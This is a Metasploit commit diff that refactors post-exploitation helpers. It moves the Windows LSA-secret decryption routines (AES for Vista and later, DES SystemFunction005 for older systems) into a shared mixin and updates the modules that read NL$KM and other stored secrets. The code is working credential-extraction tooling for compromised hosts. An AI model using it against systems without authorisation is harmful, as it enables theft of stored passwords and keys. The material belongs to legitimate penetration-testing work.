move decrypt_lsa and decrypt_secret to priv too
Rob Fuller
parent
541d932d77
commit
8f2ba68934
|
|
@ -175,7 +175,7 @@ module Msf::Post::Windows::Priv
|
|||
end
|
||||
|
||||
if( @vista == 1 )
|
||||
lsakey = decrypt_lsa(pol, bootkey)
|
||||
lsakey = decrypt_lsa_data(pol, bootkey)
|
||||
lsakey = lsakey[68,32]
|
||||
vprint_good(lsakey.unpack("H*")[0])
|
||||
else
|
||||
|
|
@ -195,9 +195,9 @@ module Msf::Post::Windows::Priv
|
|||
end
|
||||
|
||||
#
|
||||
# Decrypts the LSA key
|
||||
# Decrypts the LSA encrypted data
|
||||
#
|
||||
def decrypt_lsa(pol, encryptedkey)
|
||||
def decrypt_lsa_data(pol, encryptedkey)
|
||||
|
||||
sha256x = Digest::SHA256.new()
|
||||
sha256x << encryptedkey
|
||||
|
|
@ -210,17 +210,48 @@ module Msf::Post::Windows::Priv
|
|||
|
||||
vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
|
||||
|
||||
decryptedkey = ''
|
||||
decrypted_data = ''
|
||||
|
||||
for i in (60...pol.length).step(16)
|
||||
aes.decrypt
|
||||
aes.padding = 0
|
||||
xx = aes.update(pol[i...i+16])
|
||||
decryptedkey += xx
|
||||
decrypted_data += xx
|
||||
end
|
||||
vprint_good("Dec_Key #{decryptedkey}")
|
||||
vprint_good("Dec_Key #{decrypted_data}")
|
||||
|
||||
return decrypted_data
|
||||
end
|
||||
|
||||
# Decrypts "Secret" encrypted data
|
||||
# Ruby implementation of SystemFunction005
|
||||
# the original python code has been taken from Credump
|
||||
#
|
||||
def decrypt_secret_data(secret, key)
|
||||
|
||||
j = 0
|
||||
decrypted_data = ''
|
||||
|
||||
for i in (0...secret.length).step(8)
|
||||
enc_block = secret[i..i+7]
|
||||
block_key = key[j..j+6]
|
||||
des_key = convert_des_56_to_64(block_key)
|
||||
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
|
||||
|
||||
d1.padding = 0
|
||||
d1.key = des_key
|
||||
d1o = d1.update(enc_block)
|
||||
d1o << d1.final
|
||||
decrypted_data += d1o
|
||||
j += 7
|
||||
if (key[j..j+7].length < 7 )
|
||||
j = key[j..j+7].length
|
||||
end
|
||||
end
|
||||
dec_data_len = decrypted_data[0].ord
|
||||
|
||||
return decrypted_data[8..8+dec_data_len]
|
||||
|
||||
return decryptedkey
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
|
|
@ -53,36 +53,6 @@ class Metasploit3 < Msf::Post
|
|||
end
|
||||
end
|
||||
|
||||
def decrypt_secret(secret, key)
|
||||
|
||||
# Ruby implementation of SystemFunction005
|
||||
# the original python code has been taken from Credump
|
||||
|
||||
j = 0
|
||||
decrypted_data = ''
|
||||
|
||||
for i in (0...secret.length).step(8)
|
||||
enc_block = secret[i..i+7]
|
||||
block_key = key[j..j+6]
|
||||
des_key = convert_des_56_to_64(block_key)
|
||||
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
|
||||
|
||||
d1.padding = 0
|
||||
d1.key = des_key
|
||||
d1o = d1.update(enc_block)
|
||||
d1o << d1.final
|
||||
decrypted_data += d1o
|
||||
j += 7
|
||||
if (key[j..j+7].length < 7 )
|
||||
j = key[j..j+7].length
|
||||
end
|
||||
end
|
||||
dec_data_len = decrypted_data[0].ord
|
||||
|
||||
return decrypted_data[8..8+dec_data_len]
|
||||
|
||||
end
|
||||
|
||||
def capture_nlkm(lsakey)
|
||||
ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\Secrets\\NL$KM\\CurrVal", KEY_READ)
|
||||
nlkm = ok.query_value("").data
|
||||
|
|
@ -91,9 +61,9 @@ class Metasploit3 < Msf::Post
|
|||
print_status("Encrypted NL$KM: #{nlkm.unpack("H*")[0]}") if( datastore['DEBUG'] )
|
||||
|
||||
if( @vista == 1 )
|
||||
nlkm_dec = decrypt_lsa( nlkm[0..-1], lsakey)
|
||||
nlkm_dec = decrypt_lsa_data( nlkm[0..-1], lsakey)
|
||||
else
|
||||
nlkm_dec = decrypt_secret( nlkm[0xC..-1], lsakey)
|
||||
nlkm_dec = decrypt_secret_data( nlkm[0xC..-1], lsakey)
|
||||
end
|
||||
|
||||
return nlkm_dec
|
||||
|
|
|
|||
|
|
@ -30,36 +30,6 @@ class Metasploit3 < Msf::Post
|
|||
))
|
||||
end
|
||||
|
||||
def decrypt_secret(secret, key)
|
||||
|
||||
# Ruby implementation of SystemFunction005
|
||||
# the original python code has been taken from Credump
|
||||
|
||||
j = 0
|
||||
decrypted_data = ''
|
||||
|
||||
for i in (0...secret.length).step(8)
|
||||
enc_block = secret[i..i+7]
|
||||
block_key = key[j..j+6]
|
||||
des_key = convert_des_56_to_64(block_key)
|
||||
d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
|
||||
|
||||
d1.padding = 0
|
||||
d1.key = des_key
|
||||
d1o = d1.update(enc_block)
|
||||
d1o << d1.final
|
||||
decrypted_data += d1o
|
||||
j += 7
|
||||
if (key[j..j+7].length < 7 )
|
||||
j = key[j..j+7].length
|
||||
end
|
||||
end
|
||||
dec_data_len = decrypted_data[0].ord
|
||||
|
||||
return decrypted_data[8..8+dec_data_len]
|
||||
|
||||
end
|
||||
|
||||
def reg_getvaldata(key,valname)
|
||||
v = nil
|
||||
begin
|
||||
|
|
@ -97,11 +67,11 @@ class Metasploit3 < Msf::Post
|
|||
if( @vista == 1 )
|
||||
#Magic happens here
|
||||
sec = sec[0..-1]
|
||||
sec = decrypt_lsa(sec, lkey)[1..-1].scan(/[[:print:]]/).join
|
||||
sec = decrypt_lsa_data(sec, lkey)[1..-1].scan(/[[:print:]]/).join
|
||||
else
|
||||
#and here
|
||||
sec = sec[0xC..-1]
|
||||
sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
|
||||
sec = decrypt_secret_data(sec, lkey).scan(/[[:print:]]/).join
|
||||
end
|
||||
|
||||
if(sec.length > 0)
|
||||
|
|
|
|||
Loading…
Reference in New Issue